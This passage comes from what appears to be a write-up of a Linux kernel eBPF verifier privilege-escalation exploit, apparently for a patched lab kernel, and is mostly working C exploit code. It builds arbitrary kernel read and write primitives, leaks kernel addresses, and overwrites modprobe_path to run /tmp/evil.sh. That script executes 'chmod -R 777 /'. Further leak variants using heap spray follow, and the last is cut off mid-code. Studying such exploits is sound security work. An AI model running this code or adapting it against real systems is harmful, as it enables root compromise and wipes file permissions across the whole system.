r1.mask == (u64)0, __mark_reg_known -&gt; // ___mark_reg_known is called. // By this calling then r1&#39;s min and max will be imm. // Because (~0xffffffff00000001) &amp; 0xffffffff00000000 == 0 and // (~0xfffffffe00000001) &amp; 0xffffffff00000000 == 0x100000000, we must use // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe). BPF_ALU64_REG(BPF_OR, BPF_REG_1, BPF_REG_2), // r1 = (s32_min=1, s32_max=0, u32_min=1, // u32_max=0). BPF_MOV32_REG(BPF_REG_1, BPF_REG_1), // r1(w1) = w1(r1) BPF_MOV64_REG(BPF_REG_0, BPF_REG_6), // r0 = r6 BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_1), // r0 += r1 BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_0, -0x10), // *(u64*)(fp-0x10) = r0 // arg1(mapfd) BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd), // arg2(&amp;key) = fp-0x08 BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x08, 0), // *(u64*)(fp-0x08) = 0 BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP), // arg2 = fp BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x08), // arg2 = arg2(fp)-0x08 // arg3(&amp;val) = fp-0x10 BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP), // arg3 = fp BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x10), // arg3 = arg3(fp)-0x10 // arg4(flags) BPF_MOV64_IMM(BPF_REG_ARG4, 0), // arg4 = 0 // map_update_elem(mapfd, &amp;key, &amp;val, 0) BPF_EMIT_CALL(BPF_FUNC_map_update_elem), BPF_MOV64_IMM(BPF_REG_0, 0), BPF_EXIT_INSN(), }; union bpf_attr prog_attr = { .prog_type = BPF_PROG_TYPE_SOCKET_FILTER, .insn_cnt = sizeof(insns) / sizeof(insns[0]), .insns = (uint64_t)insns, .license = (uint64_t)&#34;GPL v2&#34;, .log_level = 2, .log_size = sizeof(verifier_log), .log_buf = (uint64_t)verifier_log, }; int progfd = bpf(BPF_PROG_LOAD, &amp;prog_attr); if (progfd &lt; 0) { puts(&#34;============[failed reason]============&#34;); printf(&#34;%s\n&#34;, verifier_log); fatal(&#34;bpf(BPF_PROG_LOAD)&#34;); } int socks[2]; if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) { fatal(&#34;socketpair&#34;); } if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;progfd, sizeof(int))) { fatal(&#34;setsockopt&#34;); } write(socks[1], &#34;Hello&#34;, 5); bpf_map_lookup(mapfd, 0, &amp;val); close(socks[0]); close(socks[1]); close(progfd); return val - 1 - 0x110; } uint64_t aaw64(uint64_t addr, uint64_t val) { char verifier_log[0x10000]; uint64_t map_val = 1; bpf_map_update(mapfd, 0, &amp;map_val); struct bpf_insn insns[] = { // BPF_REG_ARG1 == struct __sk_buff BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1, -0x08), // *(u64*)(fp-0x08) = skb // arg1(mapfd) BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd), // arg2(key) = fp-0x10 BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0), BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP), BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10), // call map_lookup_elem(mapfd, &amp;key(-&gt;0)) BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem), BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), BPF_EXIT_INSN(), BPF_MOV64_REG(BPF_REG_6, BPF_REG_0), // r6 = r0 == map_elem BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 0), // r7 = [r0] == (val=1, mask=0xffffffffffffffff) BPF_MOV64_REG(BPF_REG_1, BPF_REG_7), // r1 = r7 BPF_ALU64_IMM(BPF_RSH, BPF_REG_1, 32), // r1 = (val=0, mask=0x00000000ffffffff) BPF_ALU64_IMM(BPF_LSH, BPF_REG_1, 32), // r1 = (val=0, mask=0xffffffff00000000) BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe), // r2 = 0x00000000fffffffe BPF_ALU64_IMM(BPF_LSH, BPF_REG_2, 32), // r2 = (val=0xfffffffe00000000, mask=0) BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, 1), // r2 = (val=0xfffffffe00000001, mask=0) // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp; // (~this.val)). // And if r1.mask == (u64)0, __mark_reg_known -&gt; // ___mark_reg_known is called. // By this calling then r1&#39;s min and max will be imm. // Because (~0xffffffff00000001) &amp; 0xffffffff00000000 == 0 and // (~0xfffffffe00000001) &amp; 0xffffffff00000000 == 0x100000000, we must use // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe). BPF_ALU64_REG(BPF_OR, BPF_REG_1, BPF_REG_2), // r1 = (s32_min=1, s32_max=0, u32_min=1, // u32_max=0). BPF_MOV32_REG(BPF_REG_1, BPF_REG_1), // r1(w1) = (s32_min=1, s32_max=0, // u32_min=1, u32_max=0). BPF_MOV64_REG( BPF_REG_2, BPF_REG_7), // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff) BPF_ALU64_IMM(BPF_AND, BPF_REG_2, 0x1), // r2 = (val=1, mask=0x1) BPF_ALU64_REG(BPF_ADD, BPF_REG_1, BPF_REG_2), // r1 = r1 + r2 == (actual_val = 2; s32_min=1, // s32_max=1, u32_min=1, u32_max=1) == // (actual_val=2; val=1, mask=0) BPF_ALU64_IMM(BPF_ADD, BPF_REG_1, -1), // r1 = r1 + -1 == (actual_val=1; val=0, mask=0) BPF_MOV64_REG(BPF_REG_8, BPF_REG_1), // r8 = r1 == (actual_val=1; val=0, mask=0) // arg1(skb) BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08), // arg2(offset) BPF_MOV64_IMM(BPF_REG_ARG2, 0), // arg3(to) = fp-0x20 BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP), // arg3 = fp BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20), // arg3 = arg3(fp)-0x20 BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG3, -0x18), // *(u64*)(fp-0x18) = arg3 == fp-0x20 // arg4(len) BPF_MOV64_REG(BPF_REG_ARG4, BPF_REG_8), // arg4 = r8 == (actual_val=1; val=0, mask=0) BPF_ALU64_IMM( BPF_MUL, BPF_REG_ARG4, 0x10 - 1), // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0) BPF_ALU64_IMM( BPF_ADD, BPF_REG_ARG4, 1), // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0) // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0)) BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes), // fp-0x18 = addr // arg1(skb) BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08), // arg2(offset) BPF_MOV64_IMM(BPF_REG_ARG2, 0x10), // arg3(to) = addr BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP, -0x18), // arg3 = fp-0x18 == addr // arg4(len) BPF_MOV64_IMM(BPF_REG_ARG4, 8), // skb_load_bytes(skb, 0x10, addr, 8) BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes), BPF_MOV64_IMM(BPF_REG_0, 0), BPF_EXIT_INSN(), }; union bpf_attr prog_attr = { .prog_type = BPF_PROG_TYPE_SOCKET_FILTER, .insn_cnt = sizeof(insns) / sizeof(insns[0]), .insns = (uint64_t)insns, .license = (uint64_t)&#34;GPL v2&#34;, .log_level = 2, .log_size = sizeof(verifier_log), .log_buf = (uint64_t)verifier_log, }; int progfd = bpf(BPF_PROG_LOAD, &amp;prog_attr); if (progfd &lt; 0) { puts(&#34;============[failed reason]============&#34;); printf(&#34;%s\n&#34;, verifier_log); fatal(&#34;bpf(BPF_PROG_LOAD)&#34;); } int socks[2]; if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) { fatal(&#34;socketpair&#34;); } if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;progfd, sizeof(int))) { fatal(&#34;setsockopt&#34;); } uint64_t buf[] = {0xdeadbeefcafebebe, addr, val}; write(socks[1], buf, sizeof(buf)); close(socks[0]); close(socks[1]); close(progfd); return buf[0]; } uint64_t aar64(uint64_t addr) { char verifier_log[0x10000]; uint64_t map_val = 1; bpf_map_update(mapfd, 0, &amp;map_val); struct bpf_insn insns[] = { // BPF_REG_ARG1 == struct __sk_buff BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1, -0x08), // *(u64*)(fp-0x08) = skb // arg1(mapfd) BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd), // arg2(key) = fp-0x10 BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0), BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP), BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10), // call map_lookup_elem(mapfd, &amp;key(-&gt;0)) BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem), BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), BPF_EXIT_INSN(), BPF_MOV64_REG(BPF_REG_6, BPF_REG_0), // r6 = r0 == map_elem BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 0), // r7 = [r0] == (val=1, mask=0xffffffffffffffff) BPF_MOV64_REG(BPF_REG_1, BPF_REG_7), // r1 = r7 BPF_ALU64_IMM(BPF_RSH, BPF_REG_1, 32), // r1 = (val=0, mask=0x00000000ffffffff) BPF_ALU64_IMM(BPF_LSH, BPF_REG_1, 32), // r1 = (val=0, mask=0xffffffff00000000) BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe), // r2 = 0x00000000fffffffe BPF_ALU64_IMM(BPF_LSH, BPF_REG_2, 32), // r2 = (val=0xfffffffe00000000, mask=0) BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, 1), // r2 = (val=0xfffffffe00000001, mask=0) // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp; // (~this.val)). // And if r1.mask == (u64)0, __mark_reg_known -&gt; // ___mark_reg_known is called. // By this calling then r1&#39;s min and max will be imm. // Because (~0xffffffff00000001) &amp; 0xffffffff00000000 == 0 and // (~0xfffffffe00000001) &amp; 0xffffffff00000000 == 0x100000000, we must use // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe). BPF_ALU64_REG(BPF_OR, BPF_REG_1, BPF_REG_2), // r1 = (s32_min=1, s32_max=0, u32_min=1, // u32_max=0). BPF_MOV32_REG(BPF_REG_1, BPF_REG_1), // r1(w1) = (s32_min=1, s32_max=0, // u32_min=1, u32_max=0). BPF_MOV64_REG( BPF_REG_2, BPF_REG_7), // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff) BPF_ALU64_IMM(BPF_AND, BPF_REG_2, 0x1), // r2 = (val=1, mask=0x1) BPF_ALU64_REG(BPF_ADD, BPF_REG_1, BPF_REG_2), // r1 = r1 + r2 == (actual_val = 2; s32_min=1, // s32_max=1, u32_min=1, u32_max=1) == // (actual_val=2; val=1, mask=0) BPF_ALU64_IMM(BPF_ADD, BPF_REG_1, -1), // r1 = r1 + -1 == (actual_val=1; val=0, mask=0) BPF_MOV64_REG(BPF_REG_8, BPF_REG_1), // r8 = r1 == (actual_val=1; val=0, mask=0) // arg1(skb) BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08), // arg2(offset) BPF_MOV64_IMM(BPF_REG_ARG2, 0), // arg3(to) = fp-0x20 BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP), // arg3 = fp BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20), // arg3 = arg3(fp)-0x20 BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_6, -0x18), // *(u64*)(fp-0x18) = arg3 == fp-0x20 // arg4(len) BPF_MOV64_REG(BPF_REG_ARG4, BPF_REG_8), // arg4 = r8 == (actual_val=1; val=0, mask=0) BPF_ALU64_IMM( BPF_MUL, BPF_REG_ARG4, 0x10 - 1), // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0) BPF_ALU64_IMM( BPF_ADD, BPF_REG_ARG4, 1), // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0) // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0)) BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes), // fp-0x18 = addr // arg1(mapfd) BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd), // arg2(&amp;key) BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP), BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10), // arg3(&amp;val) BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP, -0x18), // arg4(flags) BPF_MOV64_IMM(BPF_REG_ARG4, 0), // map_update_elem(mapfd, &amp;key, &amp;val, 0) BPF_EMIT_CALL(BPF_FUNC_map_update_elem), BPF_MOV64_IMM(BPF_REG_0, 0), BPF_EXIT_INSN(), }; union bpf_attr prog_attr = { .prog_type = BPF_PROG_TYPE_SOCKET_FILTER, .insn_cnt = sizeof(insns) / sizeof(insns[0]), .insns = (uint64_t)insns, .license = (uint64_t)&#34;GPL v2&#34;, .log_level = 2, .log_size = sizeof(verifier_log), .log_buf = (uint64_t)verifier_log, }; int progfd = bpf(BPF_PROG_LOAD, &amp;prog_attr); if (progfd &lt; 0) { puts(&#34;============[failed reason]============&#34;); printf(&#34;%s\n&#34;, verifier_log); fatal(&#34;bpf(BPF_PROG_LOAD)&#34;); } int socks[2]; if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) { fatal(&#34;socketpair&#34;); } if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;progfd, sizeof(int))) { fatal(&#34;setsockopt&#34;); } uint64_t buf[] = {0xdeadbeefcafebebe, addr}; write(socks[1], buf, sizeof(buf)); bpf_map_lookup(mapfd, 0, &amp;map_val); close(socks[0]); close(socks[1]); close(progfd); return map_val; } uint64_t bpf_map_addr = 0; int main() { srand(time(NULL)); mapfd = bpf_map_create(sizeof(uint64_t), 1); bpf_map_addr = leak_bpf_map_addr(); printf(&#34;[+] bpf_map_addr: 0x%016lx, &amp;bpf_map_elem = 0x%016lx\n&#34;, bpf_map_addr, bpf_map_addr + 0x110); const uint64_t kernel_base = aar64(bpf_map_addr) - BPF_MAP_OPS_OFFSET; printf(&#34;[+] kernel_base: 0x%016lx\n&#34;, kernel_base); const char* new_modprobe = &#34;/tmp/evil.sh&#34;; const size_t new_modprobe_len = strlen(new_modprobe); printf(&#34;[*] Overwrite modprobe to %s\n&#34;, new_modprobe); for (size_t i = 0; i &lt; new_modprobe_len; i += 8) { aaw64(kernel_base + MODPROB_OFFSET + i, *(uint64_t*)(new_modprobe + i)); } { int fd = open(&#34;/proc/sys/kernel/modprobe&#34;, O_RDONLY); if (fd &lt; 0) { fatal(&#34;open(/proc/sys/kernel/modprobe)&#34;); } char modprobe[0x100]; read(fd, modprobe, sizeof(modprobe)); if (strncmp(modprobe, new_modprobe, new_modprobe_len)) { printf(&#34;[*] new modprobe: %s\n&#34;, modprobe); puts(&#34;[-] Failed to overwrite modprobe&#34;); return -1; } puts(&#34;[+] Successfully overwritten modprobe&#34;); } puts(&#34;[+] Get root&#34;); system(&#34;echo -e &#39;#!/bin/sh\nchmod -R 777 /&#39; &gt; /tmp/evil.sh&#34;); system(&#34;chmod +x /tmp/evil.sh&#34;); system(&#34;echo -e &#39;\xde\xad\xbe\xef&#39; &gt; /tmp/pwn&#34;); system(&#34;chmod +x /tmp/pwn&#34;); system(&#34;/tmp/pwn&#34;); return 0; }</code></pre></div> <h3 id="leaks">Leaks</h3> <h4 id="leak-addr-of-struct-bpf_map-using-adjust_ptr_min_max_vals">Leak addr of <code>struct bpf_map</code> using <code>adjust_ptr_min_max_vals</code></h4> <div class="collapsable-code"> <input id="546928317" type="checkbox" checked /> <label for="546928317"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">leak_bpf_map_using_adjust_ptr_min_max_vals.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>// Patch location: // https://elixir.bootlin.com/linux/v5.18.14/source/kernel/bpf/verifier.c#L7957 // Diff: // 7957c7957,7958 // &lt; __mark_reg32_known(dst_reg, var32_off.value); // --- // &gt; // `scalar_min_max_or` will handler the case // &gt; //__mark_reg32_known(dst_reg, var32_off.value); #include &lt;asm-generic/socket.h&gt; #include &lt;fcntl.h&gt; #include &lt;linux/bpf.h&gt; #include &lt;stdint.h&gt; #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;string.h&gt; #include &lt;sys/socket.h&gt; #include &lt;sys/syscall.h&gt; #include &lt;sys/types.h&gt; #include &lt;time.h&gt; #include &lt;unistd.h&gt; #include &#34;bpf_insn.h&#34; #define KERNEL_BASE 0xffffffff81000000 #define BPF_MAP_OPS_OFFSET (0xffffffff81c124a0 - KERNEL_BASE) #define CORE_PATTERN_OFFSET (0xffffffff81eb25e0 - KERNEL_BASE) #define MODBPROB_OFFSET (0xffffffff81e37fe0 - KERNEL_BASE) void get_enter_to_continue(const char* msg) { puts(msg); getchar(); } void fatal(const char* msg) { perror(msg); // get_enter_to_continue(&#34;Press enter to exit...&#34;); exit(-1); } int bpf(int cmd, union bpf_attr* attrs) { return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs)); } int bpf_map_create(int val_size, int max_entries) { union bpf_attr attr = { .map_type = BPF_MAP_TYPE_ARRAY, .key_size = sizeof(int), .value_size = val_size, .max_entries = max_entries, }; int map_fd = bpf(BPF_MAP_CREATE, &amp;attr); if (map_fd &lt; 0) { fatal(&#34;bpf(BPF_MAP_CREATE)&#34;); } return map_fd; } int bpf_map_update(int map_fd, int key, void* pval) { union bpf_attr attr = { .map_fd = map_fd, .key = (uint64_t)&amp;key, .value = (uint64_t)pval, .flags = BPF_ANY, }; int res = bpf(BPF_MAP_UPDATE_ELEM, &amp;attr); if (res &lt; 0) { fatal(&#34;bpf(BPF_MAP_UPDATE_ELEM)&#34;); } return res; } int bpf_map_lookup(int map_fd, int key, void* pval) { union bpf_attr attr = { .map_fd = map_fd, .key = (uint64_t)&amp;key, .value = (uint64_t)pval, .flags = BPF_ANY, }; return bpf(BPF_MAP_LOOKUP_ELEM, &amp;attr); } int mapfd = -1; uint64_t leak_bpf_map_addr() { char verifier_log[0x10000]; uint64_t val = 0; bpf_map_update(mapfd, 0, &amp;val); struct bpf_insn insns[] = { // arg1(mapfd) BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd), // arg2(key) = fp-0x08 BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x08, 0), BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP), BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x08), // call map_lookup_elem(mapfd, &amp;key(-&gt;0)) BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem), BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), BPF_EXIT_INSN(), BPF_MOV64_REG(BPF_REG_6, BPF_REG_0), // r6 = r0 BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 0), // r7 = [r0] BPF_MOV64_REG(BPF_REG_1, BPF_REG_7), // r1 = r7 BPF_ALU64_IMM(BPF_RSH, BPF_REG_1, 32), // r1 = (val=0, mask=0x00000000ffffffff) BPF_ALU64_IMM(BPF_LSH, BPF_REG_1, 32), // r1 = (val=0, mask=0xffffffff00000000) BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe), // r2 = 0x00000000fffffffe BPF_ALU64_IMM(BPF_LSH, BPF_REG_2, 32), // r2 = (val=0xfffffffe00000000, mask=0) BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, 1), // r2 = (val=0xfffffffe00000001, mask=0) // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp; // (~this.val)). // And if r1.mask == (u64)0, __mark_reg_known -&gt; // ___mark_reg_known is called. // By this calling then r1&#39;s min and max will be imm. // Because (~0xffffffff00000001) &amp; 0xffffffff00000000 == 0 and // (~0xfffffffe00000001) &amp; 0xffffffff00000000 == 0x100000000, we must use // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe). BPF_ALU64_REG(BPF_OR, BPF_REG_1, BPF_REG_2), // r1 = (s32_min=1, s32_max=0, u32_min=1, // u32_max=0). BPF_MOV32_REG(BPF_REG_1, BPF_REG_1), // r1(w1) = w1(r1) BPF_MOV64_REG(BPF_REG_0, BPF_REG_6), // r0 = r6 BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_1), // r0 += r1 BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_0, -0x10), // *(u64*)(fp-0x10) = r0 // arg1(mapfd) BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd), // arg2(&amp;key) = fp-0x08 BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x08, 0), // *(u64*)(fp-0x08) = 0 BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP), // arg2 = fp BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x08), // arg2 = arg2(fp)-0x08 // arg3(&amp;val) = fp-0x10 BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP), // arg3 = fp BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x10), // arg3 = arg3(fp)-0x10 // arg4(flags) BPF_MOV64_IMM(BPF_REG_ARG4, 0), // arg4 = 0 // map_update_elem(mapfd, &amp;key, &amp;val, 0) BPF_EMIT_CALL(BPF_FUNC_map_update_elem), BPF_MOV64_IMM(BPF_REG_0, 0), BPF_EXIT_INSN(), }; union bpf_attr prog_attr = { .prog_type = BPF_PROG_TYPE_SOCKET_FILTER, .insn_cnt = sizeof(insns) / sizeof(insns[0]), .insns = (uint64_t)insns, .license = (uint64_t)&#34;GPL v2&#34;, .log_level = 2, .log_size = sizeof(verifier_log), .log_buf = (uint64_t)verifier_log, }; int progfd = bpf(BPF_PROG_LOAD, &amp;prog_attr); if (progfd &lt; 0) { puts(&#34;============[failed reason]============&#34;); printf(&#34;%s\n&#34;, verifier_log); fatal(&#34;bpf(BPF_PROG_LOAD)&#34;); } int socks[2]; if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) { fatal(&#34;socketpair&#34;); } if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;progfd, sizeof(int))) { fatal(&#34;setsockopt&#34;); } write(socks[1], &#34;Hello&#34;, 5); bpf_map_lookup(mapfd, 0, &amp;val); close(socks[0]); close(socks[1]); close(progfd); return val - 1 - 0x110; } uint64_t bpf_map_addr = 0; int main() { srand(time(NULL)); char verifier_log[0x10000]; mapfd = bpf_map_create(sizeof(uint64_t), 1); bpf_map_addr = leak_bpf_map_addr(); printf(&#34;[+] bpf_map_addr: 0x%016lx, &amp;bpf_map_elem = 0x%016lx\n&#34;, bpf_map_addr, bpf_map_addr + 0x110); return 0; }</code></pre></div> <h4 id="leak-addr-of-struct-bpf_map-using-oob-read--heap-spray">Leak addr of <code>struct bpf_map</code> using oob read &amp; heap spray</h4> <div class="collapsable-code"> <input id="376148295" type="checkbox" checked /> <label for="376148295"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">leak_bpf_map_using_oob_read.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>// Patch location: // https://elixir.bootlin.com/linux/v5.18.14/source/kernel/bpf/verifier.c#L7957 // Diff: // 7957c7957,7958 // &lt; __mark_reg32_known(dst_reg, var32_off.value); // --- // &gt; // `scalar_min_max_or` will handler the case // &gt; //__mark_reg32_known(dst_reg, var32_off.value); #include &lt;asm-generic/socket.h&gt; #include &lt;fcntl.h&gt; #include &lt;linux/bpf.h&gt; #include &lt;stdint.h&gt; #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;string.h&gt; #include &lt;sys/socket.h&gt; #include &lt;sys/syscall.h&gt; #include &lt;sys/types.h&gt; #include &lt;time.h&gt; #include &lt;unistd.h&gt; #include &#34;bpf_insn.h&#34; #define KERNEL_BASE 0xffffffff81000000 #define BPF_MAP_OPS_OFFSET (0xffffffff81c124a0 - KERNEL_BASE) #define BPF_MAP_OPS_LOOKUP_IDX 12 #define BPF_MAP_OPS_LOOKUP_ELEM_OFFSET \ (BPF_MAP_OPS_OFFSET + BPF_MAP_OPS_LOOKUP_IDX * 8) #define BPF_MAP_OPS_UPDATE_ELEM_IDX 13 #define BPF_MAP_OPS_UPDATE_ELEM_OFFSET \ (BPF_MAP_OPS_OFFSET + BPF_MAP_OPS_UPDATE_ELEM_IDX * 8) #define CORE_PATTERN_OFFSET (0xffffffff81eb25e0 - KERNEL_BASE) #define MODBPROB_OFFSET (0xffffffff81e37fe0 - KERNEL_BASE) void get_enter_to_continue(const char* msg) { puts(msg); getchar(); } void fatal(const char* msg) { perror(msg); // get_enter_to_continue(&#34;Press enter to exit...&#34;); exit(-1); } int bpf(int cmd, union bpf_attr* attrs) { return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs)); } int bpf_map_create(int val_size, int max_entries) { union bpf_attr attr = { .map_type = BPF_MAP_TYPE_ARRAY, .key_size = sizeof(int), .value_size = val_size, .max_entries = max_entries, }; int map_fd = bpf(BPF_MAP_CREATE, &amp;attr); if (map_fd &lt; 0) { fatal(&#34;bpf(BPF_MAP_CREATE)&#34;); } return map_fd; } int bpf_map_update(int map_fd, int key, void* pval) { union bpf_attr attr = { .map_fd = map_fd, .key = (uint64_t)&amp;key, .value = (uint64_t)pval, .flags = BPF_ANY, }; int res = bpf(BPF_MAP_UPDATE_ELEM, &amp;attr); if (res &lt; 0) { fatal(&#34;bpf(BPF_MAP_UPDATE_ELEM)&#34;); } return res; } int bpf_map_lookup(int map_fd, int key, void* pval) { union bpf_attr attr = { .map_fd = map_fd, .key = (uint64_t)&amp;key, .value = (uint64_t)pval, .flags = BPF_ANY, }; return bpf(BPF_MAP_LOOKUP_ELEM, &amp;attr); } int mapfd; int map_spray_fd[0x100]; void make_corrupted_map() { uint64_t map_val = 1; puts(&#34;[*] Spray struct bpf_map...&#34;); for (int i = 0; i &lt; sizeof(map_spray_fd) / 4; i++) { map_spray_fd[i] = bpf_map_create(sizeof(uint64_t), 1); bpf_map_update(map_spray_fd[i], 0, &amp;map_val); } mapfd = map_spray_fd[0x81]; char verifier_log[0x10000]; bpf_map_update(mapfd, 0, &amp;map_val); struct bpf_insn insns[] = { // BPF_REG_ARG1 == struct __sk_buff BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1, -0x08), // *(u64*)(fp-0x08) = skb // arg1(mapfd) BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd), // arg2(key) = fp-0x10 BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0), BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP), BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10), // call map_lookup_elem(mapfd, &amp;key(-&gt;0)) BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem), BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), BPF_EXIT_INSN(), BPF_MOV64_REG(BPF_REG_6, BPF_REG_0), // r6 = r0 == map_elem BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 0), // r7 = [r0] == (val=1, mask=0xffffffffffffffff) BPF_MOV64_REG(BPF_REG_1, BPF_REG_7), // r1 = r7 BPF_ALU64_IMM(BPF_RSH, BPF_REG_1, 32), // r1 = (val=0, mask=0x00000000ffffffff) BPF_ALU64_IMM(BPF_LSH, BPF_REG_1, 32), // r1 = (val=0, mask=0xffffffff00000000) BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe), // r2 = 0x00000000fffffffe BPF_ALU64_IMM(BPF_LSH, BPF_REG_2, 32), // r2 = (val=0xfffffffe00000000, mask=0) BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, 1), // r2 = (val=0xfffffffe00000001, mask=0) // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp; // (~this.val)). // And if r1.mask == (u64)0, __mark_reg_known -&gt; // ___mark_reg_known is called. // By this calling then r1&#39;s min and max will be imm. // Because (~0xffffffff00000001) &amp; 0xffffffff00000000 == 0 and // (~0xfffffffe00000001) &amp; 0xffffffff00000000 == 0x100000000, we must use // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe). BPF_ALU64_REG(BPF_OR, BPF_REG_1, BPF_REG_2), // r1 = (s32_min=1, s32_max=0, u32_min=1, // u32_max=0). BPF_MOV32_REG(BPF_REG_1, BPF_REG_1), // r1(w1) = (s32_min=1, s32_max=0, // u32_min=1, u32_max=0). BPF_MOV64_REG( BPF_REG_2, BPF_REG_7), // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff) BPF_ALU64_IMM(BPF_AND, BPF_REG_2, 0x1), // r2 = (val=1, mask=0x1) BPF_ALU64_REG(BPF_ADD, BPF_REG_1, BPF_REG_2), // r1 = r1 + 